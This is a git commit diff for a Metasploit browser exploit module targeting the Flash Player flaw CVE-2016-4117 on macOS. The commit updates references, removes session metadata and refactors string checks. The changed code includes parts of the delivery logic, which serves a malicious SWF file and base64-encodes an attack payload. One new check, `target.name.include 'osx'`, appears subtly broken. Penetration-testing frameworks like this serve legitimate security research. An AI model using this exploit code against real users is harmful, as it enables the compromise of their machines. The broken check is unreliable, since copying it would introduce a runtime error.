update references, remove unused metadata, use more straightforward string operations

GSoC/Meterpreter_Web_Console
Brent Cook 2018-12-21 02:49:13 -06:00
parent 0dab74a71f
commit a7e8afe760
1 changed files with 8 additions and 6 deletions

View File

@ -27,14 +27,16 @@ class MetasploitModule < Msf::Exploit::Remote
'References' =>
[
['CVE', '2016-4117'],
['URL', 'https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-4117'],
['URL', 'https://www.fireeye.com/blog/threat-research/2016/05/cve-2016-4117-flash-zero-day.html']
['BID', '90505'],
['URL', 'https://www.fireeye.com/blog/threat-research/2016/05/cve-2016-4117-flash-zero-day.html'],
['URL', 'http://www.securitytracker.com/id/1035826'],
['URL', 'https://helpx.adobe.com/security/products/flash-player/apsa16-02.html'],
['URL', 'https://helpx.adobe.com/security/products/flash-player/apsb16-15.html'],
],
'Payload' =>
{
'DisableNops' => true
},
'SessionTypes' => ['shell'],
'Platform' => ['osx'],
'BrowserRequirements' =>
{
@ -83,7 +85,7 @@ class MetasploitModule < Msf::Exploit::Remote
def on_request_exploit(cli, request, target_info)
print_status("Request: #{request.uri}")
if request.uri =~ /\.swf$/
if request.uri.end_with? 'swf'
print_status('Sending SWF...')
send_response(cli, @swf, 'Content-Type' => 'application/x-shockwave-flash', 'Cache-Control' => 'no-cache, no-store', 'Pragma' => 'no-cache')
return
@ -94,11 +96,11 @@ class MetasploitModule < Msf::Exploit::Remote
end
def exploit_template(cli, target_info)
swf_random = "#{rand_text_alpha(rand(3..7))}.swf"
swf_random = "#{rand_text_alpha(3..7)}.swf"
target_payload = get_payload(cli, target_info)
b64_payload = Rex::Text.encode_base64(target_payload)
if target.name =~ /osx/
if target.name.include 'osx'
platform_id = 'osx'
end
html_template = %(<html>